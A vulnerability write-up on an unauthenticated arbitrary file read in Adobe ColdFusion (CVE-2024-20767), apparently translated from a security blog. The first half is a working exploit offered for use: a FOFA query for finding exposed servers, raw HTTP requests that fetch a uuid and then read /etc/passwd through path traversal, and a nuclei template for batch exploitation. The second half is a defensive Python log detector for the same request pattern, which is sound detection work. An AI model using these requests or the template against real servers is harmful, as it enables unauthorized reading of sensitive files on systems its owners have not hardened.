Disclaimer:

This article is shared as study notes for technical learning reference only. Do not use it for unlawful purposes. Any direct or indirect consequences or losses caused by any individual or organization using the information provided here are the sole responsibility of the user and have nothing to do with the author!!!

Vulnerability description

Because of improper access control in Adobe ColdFusion, an unauthenticated remote attacker can craft malicious requests to read arbitrary files on the target server and disclose sensitive information.

Affected versions

ColdFusion 2021 <= Update 12 && ColdFusion 2023 <= Update 6

FOFA query

app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"

Vulnerability reproduction

Open the page

Construct the payload

Request the uuid

GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Use the obtained uuid to read a file

GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

Batch verification with nuclei

id: Adobe-ColdFusion-information-read

info:
  name: Adobe ColdFusion 任意文件读取漏洞(CVE-2024-20767)
  author: changge
  severity: high
  description: ColdFusion 2021 <= Update 12 && ColdFusion 2023 <= Update 6
  metadata:
    max-request: 1
    fofa-query: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
    verified: true
requests:
  - raw:
      - |
        GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close

      - |
        GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        uuid: {{uuid}}

    extractors:
      - type: regex
        name: uuid
        group: 1
        internal: true
        part: body
        regex:
          - "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1, 'uuid') && status_code_2 == 200 && contains(body_2, 'root:')"
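From the defender's side, the same two-request pattern the template checks for (an unauthenticated hit on the adminapi heartbeat endpoint, then a /pms logging request whose file_name parameter traverses out of the log directory) is easy to flag in web-server access logs. The detector below is an added example, not code from the original post or from Adobe; the log lines, IP addresses and finding labels are constructed for illustration.

```python
"""Flag CVE-2024-20767 request patterns in combined-format access logs."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Apr/2024:15:33:24 +0000] "GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Apr/2024:15:33:31 +0000] "GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Apr/2024:15:40:02 +0000] "GET /pms?module=logging&file_name=%2e%2e%2f%2e%2e%2fetc%2fpasswd&number_of_lines=50 HTTP/1.1" 200 900 "-" "curl/8.0"
192.0.2.9 - - [06/Apr/2024:15:41:10 +0000] "GET /pms?module=logging&file_name=application.log&number_of_lines=100 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Apr/2024:15:42:00 +0000] "GET /index.cfm HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# a ".." path segment bounded by slashes, or an absolute path
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)|^[\\/]')


def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path.startswith("/CFIDE/adminapi/"):
        # the adminapi should never be reachable unauthenticated from the outside
        return "adminapi-heartbeat-probe" if "getHeartBeat" in unquote(parts.query) else "adminapi-access"
    if path == "/pms":
        for name in parse_qs(parts.query).get("file_name", []):
            # parse_qs decoded once; decode again so encoded variants are normalised
            if TRAVERSAL_RE.search(unquote(name)):
                return "pms-file-read-traversal"
    return None


def scan(log_text):
    """Return (client_ip, label, status) for every suspicious line in log_text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group("target"))
        if label:
            findings.append((m.group("ip"), label, int(m.group("status"))))
    return findings


if __name__ == "__main__":
    for ip, label, status in scan(SAMPLE_LOG):
        print(f"{ip} {label} HTTP {status}")
```

A 200 on the traversal request is the strongest signal that the read succeeded; the heartbeat probe alone is worth alerting on because the adminapi path should be blocked at the reverse proxy per Adobe's lockdown guidance.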

GitHub PoC collection: https://github.com/AYcg/poc